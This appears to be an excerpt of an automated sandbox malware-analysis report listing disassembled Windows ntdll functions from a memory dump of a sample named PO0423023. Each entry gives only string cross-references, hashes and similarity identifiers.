Function 019F273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 01A321DE
.Local, xrefs: 019F28D8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A321D9, 01A322B1
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A322B6

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 6a2ff2937e57994fe0f14c036f7dd6680aafe0f103af1adf73106dcf7be79061
Instruction ID: 0a835d62205f6330645d97c81e1b311a562a0da3d1edc5d4c81fd69bfd3093cb
Opcode Fuzzy Hash: 6a2ff2937e57994fe0f14c036f7dd6680aafe0f103af1adf73106dcf7be79061
Instruction Fuzzy Hash: DCA19031901229ABDB24CF98CD84BA9B7B4BF58314F2441EAEA08A7251D730DEC0CF90

Uniqueness

Uniqueness Score: -1.00%

Function 019F4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

RtlDeactivateActivationContext, xrefs: 01A33425, 01A33432, 01A33451
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A33437
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A33456
SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A3342A

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: bfa44b4a4e880013c32fcfad92217210373a14ac9cdbf4abf34cd02e4cf61508
Instruction ID: 243f131d549013cc928f6d38c37f8bbb8b56fba587fe89f5fcedb9d55659ea35
Opcode Fuzzy Hash: bfa44b4a4e880013c32fcfad92217210373a14ac9cdbf4abf34cd02e4cf61508
Instruction Fuzzy Hash: DE610336614712ABDB22CF1DC841B2AB7E5BFC0B62F15851DFA599B242D730E801CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 019C64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A210AE
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A2106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A21028
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A20FE5

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: cb698fd463fb65de3ba605b3aa83a0a811e770ad98a33caf913854a49f8699c2
Instruction ID: cf49ea2d26edbecb69802858c6491c824447e7d6ddf633d60824269772b05e78
Opcode Fuzzy Hash: cb698fd463fb65de3ba605b3aa83a0a811e770ad98a33caf913854a49f8699c2
Instruction Fuzzy Hash: BA71B1719043459FCB21DF18C984F977FA8AFA4B64F50046CF9888B286D734D589CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 019E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 019E2462
minkernel\ntdll\ldrinit.c, xrefs: 01A2A9A2
LdrpDynamicShimModule, xrefs: 01A2A998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A2A992

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 4a64d344f78d25da48886b3695f275dc725f06ffeede359f17abadda08537335
Instruction ID: 29b56b4b114a4cf3a382bacf34119c5c1c4795421b293cfef1463fe9301a6483
Opcode Fuzzy Hash: 4a64d344f78d25da48886b3695f275dc725f06ffeede359f17abadda08537335
Instruction Fuzzy Hash: F0316D7AB00251ABDB32DF9ED8C5E6A77B9FFC4B00F150419F905A7256D7706982C780

Uniqueness

Uniqueness Score: -1.00%

Function 019D29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 019D327D
HEAP: , xrefs: 019D3264
HEAP[%wZ]: , xrefs: 019D3255

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: e39f23a793178a41de65abd7177f57e9e7eded70c7dddb97ff36674a23235664
Instruction ID: 494d24020a688c57a50c2ca3789ae33d2691f9e4d6e9f1da675266b7669fc67e
Opcode Fuzzy Hash: e39f23a793178a41de65abd7177f57e9e7eded70c7dddb97ff36674a23235664
Instruction Fuzzy Hash: 2492CC71A042499FDB25CF68C440BAEBBF5FF48301F18C499E959AB392D734AA41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 019D0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 01A250CA
HEAP: , xrefs: 01A250BD
HEAP[%wZ]: , xrefs: 01A250AE

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 960fd715935bfb38d5aacd6b55f706996eb0c419d2b4b622204f0850904ac7e1
Instruction ID: fb8f169dad767b8a0cb5bd7f53441ebcc2ca7a25fad8f703e26dd47d4a553ee4
Opcode Fuzzy Hash: 960fd715935bfb38d5aacd6b55f706996eb0c419d2b4b622204f0850904ac7e1
Instruction Fuzzy Hash: 10F1BC70A00606DFEB25DF6CC984FAAB7B5FF45304F188168E51A9B392D734E981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019E6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 019E6C24
, xrefs: 01A2CA51

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 607451c12ca255099924a64f608d7bdaa4c2ef0bfe2fd90cd56cfe517ebd9023
Instruction ID: 3e4fbe2807b6f57ae43b1f67b5670114958cba57961209e31c1bbb68e7b301df
Opcode Fuzzy Hash: 607451c12ca255099924a64f608d7bdaa4c2ef0bfe2fd90cd56cfe517ebd9023
Instruction Fuzzy Hash: D2C280716083519FDB2ACF68C884BABBBE5AF88754F04892DE98DC7241D734D845CB93

Uniqueness

Uniqueness Score: -1.00%

Function 019BA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 019BA1C1
\??\, xrefs: 01A1C1E4
FilterFullPath, xrefs: 01A1C2E6

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: ec5831c4e9d3e9201571ba2db397ffc9d80fb866b7c68be1a29d14f129df288e
Instruction ID: ccb605129c3fb1139c2ac65e5f7fafcf51a8ece649d3018d162563b04aaa1a8c
Opcode Fuzzy Hash: ec5831c4e9d3e9201571ba2db397ffc9d80fb866b7c68be1a29d14f129df288e
Instruction Fuzzy Hash: 74A17B759516299BDB31EF68CC88BEAB7B8EF48710F0001EAE90CA7254D7359E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 019E0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 01A2A10F
minkernel\ntdll\ldrinit.c, xrefs: 01A2A121
LdrpCheckModule, xrefs: 01A2A117

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: d3a6c31f93532b93ed95ee91b00efe0fccbac90e482d9eec9fa103acbacc89e3
Instruction ID: 77ae6dc4c3ef1a4ae0aab7802fc19d2a2947c0aa5ab6a03d9c714508ddcc045f
Opcode Fuzzy Hash: d3a6c31f93532b93ed95ee91b00efe0fccbac90e482d9eec9fa103acbacc89e3
Instruction Fuzzy Hash: 1671C074E00205DFDB26DFACC984AAEB7F5FB88704F18442DE90AE7652D774A942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 019D0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 01A2534D
HEAP: , xrefs: 01A25342
HEAP[%wZ]: , xrefs: 01A25335

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 1fab86c11b3230a7bd94d38cdbf350e5649ef8e191bca7fb3234051befbae92b
Instruction ID: 331df2ae0b90d322f2efa599a06d31ac53f8f64a1381f4df0d473566c6c89de1
Opcode Fuzzy Hash: 1fab86c11b3230a7bd94d38cdbf350e5649ef8e191bca7fb3234051befbae92b
Instruction Fuzzy Hash: 4E61C030A04301DFEB29CF28C584BAABBE5FF45704F18C559E4998F292D774E881CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019FC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

Failed to reallocate the system dirs string !, xrefs: 01A382D7
LdrpInitializePerUserWindowsDirectory, xrefs: 01A382DE
minkernel\ntdll\ldrinit.c, xrefs: 01A382E8

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: f0232c1cbb49dd5b08f719108fdffec12f2aa318ccc8e9649c22e9be7ec5a32a
Instruction ID: d5e7bc19a5e2b5aa574ac5ae834d7c86faeaab756ec2484395c7620625874312
Opcode Fuzzy Hash: f0232c1cbb49dd5b08f719108fdffec12f2aa318ccc8e9649c22e9be7ec5a32a
Instruction Fuzzy Hash: F641E1B5504345ABDB21EB68D984F5B77E8EF84750F00892EFA4CD32A2E774D8018B91

Uniqueness

Uniqueness Score: -1.00%

Function 01A7C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A7C1C5
@, xrefs: 01A7C1F1
PreferredUILanguages, xrefs: 01A7C212

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 440693d7e4a89c2c0a18f4d0e964d1b3f3a0b619976bbe872bb0d4cde2e599c4
Instruction ID: 04a9232a5dae39f91e90024bad4b63b9daeab7059fc7bbf579b96edf21437f5b
Opcode Fuzzy Hash: 440693d7e4a89c2c0a18f4d0e964d1b3f3a0b619976bbe872bb0d4cde2e599c4
Instruction Fuzzy Hash: D1416471D0020AEBDB11EFD8CC55BEEB7B8AB54714F14406AE609F7284E7749B448B90

Uniqueness

Uniqueness Score: -1.00%

Function 01A54144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 01A54225
LdrpResValidateFilePath Exit, xrefs: 01A54172
LdrpResValidateFilePath Enter, xrefs: 01A54160

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 56299fcb6c11285557ce84c705ed0ed9ff180a0aee89dd1648e42d7fdaa5fec2
Instruction ID: 3215c5e31ab71d4e047b34308684a7aeeea44dbe4b9e62985fc7d9a6095883c9
Opcode Fuzzy Hash: 56299fcb6c11285557ce84c705ed0ed9ff180a0aee89dd1648e42d7fdaa5fec2
Instruction Fuzzy Hash: 08414771A087588BEB26DBD9C944BADBBF4FF99380F14005ADD05EB381E7348981CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01A44755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01A44899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A44888
LdrpCheckRedirection, xrefs: 01A4488F

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 0bddbd1c7723b96c58115eb10722aed6aa17eea0feaecc59fdc784326be7f911
Instruction ID: 3a17d177ecc2c47ded605573a816b5f0ff13dba7896eeb0aafde3e0fba5187b3
Opcode Fuzzy Hash: 0bddbd1c7723b96c58115eb10722aed6aa17eea0feaecc59fdc784326be7f911
Instruction Fuzzy Hash: 8841AF72A047919BEB22CF6CD941B667BE4AFCDA50F190569ED48A7212E730D801CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019D0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01A25449
HEAP: , xrefs: 01A2543E
HEAP[%wZ]: , xrefs: 01A25431

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 0f0cad0682398b2912e813f8b1fba49fe4ed93b463cfa47e7c75d9576d002bf9
Instruction ID: 9b0a22c22bdd872f6502125ae9f1799be72eb3827a8179c4d81eb5a87ab3a0b0
Opcode Fuzzy Hash: 0f0cad0682398b2912e813f8b1fba49fe4ed93b463cfa47e7c75d9576d002bf9
Instruction Fuzzy Hash: 6E11DF317181529FEB29CA1DC884FBAF7A6FF8062AF188159F40ACB292DB34D841C750

Uniqueness

Uniqueness Score: -1.00%

Function 01A420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 01A420F3
LdrpInitializationFailure, xrefs: 01A420FA
minkernel\ntdll\ldrinit.c, xrefs: 01A42104

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 71e7cbd1dd22e9de96be903969ce0020fb7365d40ecfa3dc58f7f43e9c8d474d
Instruction ID: a8e21f2f927a2a47cf0d54a5acc25356e3e96c28f612aa2f6f79c6824ae2fc00
Opcode Fuzzy Hash: 71e7cbd1dd22e9de96be903969ce0020fb7365d40ecfa3dc58f7f43e9c8d474d
Instruction Fuzzy Hash: FDF0FC356403487BEB24D74CDD46F957768FBC4B54F500069F70477281D1F0A945C691

Uniqueness

Uniqueness Score: -1.00%

Function 019D03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A24D8A

Strings

#%u, xrefs: 01A24D82

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: ba6036c53deec1976a2ec9d9c093c22c341685c8361b276c2f0998a83628f71b
Instruction ID: 6b5bb7cc6cb0ce8b02857efdfd93bfb713d3cbe4dfd6ee56169221ba1413cd87
Opcode Fuzzy Hash: ba6036c53deec1976a2ec9d9c093c22c341685c8361b276c2f0998a83628f71b
Instruction Fuzzy Hash: 6B7159B1A0014A9FDB01DFA8C990FAEBBF8FF58704F144065E905E7251EA74EE05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 019CA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 019CAA13
LdrResSearchResource Exit, xrefs: 019CAA25

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: a60e87a9e081a0ef66e426b9c518d083d0b1132df8410e77569a3342cc0c5dd2
Instruction ID: 6bec9b9bc394089ee13592f969a41ab15ef8954927d00ab98457b37e0486713c
Opcode Fuzzy Hash: a60e87a9e081a0ef66e426b9c518d083d0b1132df8410e77569a3342cc0c5dd2
Instruction Fuzzy Hash: C0E1A271E0421D9FEF22CF9DC940BAEBBBABF49750F14442AE945E7241E7389940CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01A8A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01A8A44B
`, xrefs: 01A8A551

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 7a0cea0dc5a66d6036798dd3bdda28ea0472c823189d47b18c12550c3928bf6d
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: A0C1CF312043429BEB25EF28C841B6BBBE5AFC4318F084A2EF696CB291D778D545CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01A3E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 01A3E75A
UEFI, xrefs: 01A3E751

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 9fc6bd995607e78b43e9d0afd65e7739ea84adfd7492b2b155d1803f35244f82
Instruction ID: 7f71d8067389061673f5a8f4a7a7b972bf7aa8f37ca5f2cb1c127fcfc66437aa
Opcode Fuzzy Hash: 9fc6bd995607e78b43e9d0afd65e7739ea84adfd7492b2b155d1803f35244f82
Instruction Fuzzy Hash: B4613871E003199FDB26DFA9C940BAEBBF9FB88700F14406DE649EB291D731A940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 01A64437
MUI, xrefs: 01A64525

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 88a0d45a1cd784817eb534a05298615686172c43aacf829fa88fa30eea899040
Instruction ID: 3f8f1eb0d055d4cf7310bb183c45a5f6decabd00058bfdad9ccac46ee22398a9
Opcode Fuzzy Hash: 88a0d45a1cd784817eb534a05298615686172c43aacf829fa88fa30eea899040
Instruction Fuzzy Hash: 6B512AB1D0021DAFEF11DFA9CD84AEEBBBCEB48754F10052AE615B7290D6309E05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 019C04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 019C063D
kLsE, xrefs: 019C0540

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 2355e73b6ed139be827d7f7f3b6c71b44d36835a1359ce5e23fa3d1fe729c890
Instruction ID: a69bdf3bf4ebe901e99f8e134e154f6962f112c4375989075dfe8b4536dc7344
Opcode Fuzzy Hash: 2355e73b6ed139be827d7f7f3b6c71b44d36835a1359ce5e23fa3d1fe729c890
Instruction Fuzzy Hash: B151CD79500742CBD724DF39C6446A7BBE8AF84B05F18493EE6DE87241E7309545CF92

Uniqueness

Uniqueness Score: -1.00%

Function 019CA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 019CA2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 019CA309

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: abf3336140e23ce22d53dfc13697fb0ab6f1d386a916b5e9b02a8eef5ae7f0b3
Instruction ID: bba06430f9a564b38d48f745625aef9221cc2bf79c5617ce9089c9e7d9c3563f
Opcode Fuzzy Hash: abf3336140e23ce22d53dfc13697fb0ab6f1d386a916b5e9b02a8eef5ae7f0b3
Instruction Fuzzy Hash: 6741D371A04659DFEB15CF6DC450B6E7BB4FF84B00F14446AE948DB291E3B5DA00CB52

Uniqueness

Uniqueness Score: -1.00%

Function 019FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 019FA5E9
Cleanup Group, xrefs: 019FA5E4

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: e7cc2a7052af038e171be892598f455e1de0f4e2ee35204f3ae1fe80846bb6ca
Instruction ID: 1ce839a684051291af2588d3a78e53b946f3aa42daf3ca285db329796b54b820
Opcode Fuzzy Hash: e7cc2a7052af038e171be892598f455e1de0f4e2ee35204f3ae1fe80846bb6ca
Instruction Fuzzy Hash: 9401F4B2250744AFE312DF24CD45F1677E8E784715F01893EA64CC71A0E334D804CB46

Uniqueness

Uniqueness Score: -1.00%

Function 019CC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 019CC8C3, 019CCA40

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 73438fbf165d5077011853b0cd735223bd7af34bbb4c7d181ae1faeda92b0432
Instruction ID: eda3f742bc1aef309efddea62688ce08ed8da351f77427027973d8296bf6a68c
Opcode Fuzzy Hash: 73438fbf165d5077011853b0cd735223bd7af34bbb4c7d181ae1faeda92b0432
Instruction Fuzzy Hash: 9E825D75E002198BEB25CFA9C880BEDBBB5BF48B10F14816DD99DAB291D7309941CF52

Uniqueness

Uniqueness Score: -1.00%

Function 01A46420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 01A465C1

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e6c295872c605c6034d957674b0d827994c5e3e3c883a4c9bf3727f460dbefbb
Instruction ID: c2ce1b4653ff727752f9812f2fcedb10c36501c2ae02cd8e90b005e017466b99
Opcode Fuzzy Hash: e6c295872c605c6034d957674b0d827994c5e3e3c883a4c9bf3727f460dbefbb
Instruction Fuzzy Hash: 6E918371940219AFEB21DFA5CD85FAEBBB8EF95750F104015F608BB190D775AD00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01A6E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 01A6E1FA

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: f4845e94c6baf088917028b802bddaa9e67d69b369c33e5b3c21389b57e688e8
Instruction ID: 329763fb91f62ed2d03e1b8056fc7f63a4ca29f133bd8d6f082359a944cd3bf4
Opcode Fuzzy Hash: f4845e94c6baf088917028b802bddaa9e67d69b369c33e5b3c21389b57e688e8
Instruction Fuzzy Hash: 8391AD76A00649BEDF22EBA5DC44FAFBBBEEF85740F140029F604A7250DB349905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019FA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 01A367C9

Memory Dump Source

Source File: 00000003.00000002.2489820971.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1990000_PO0423023.jbxd

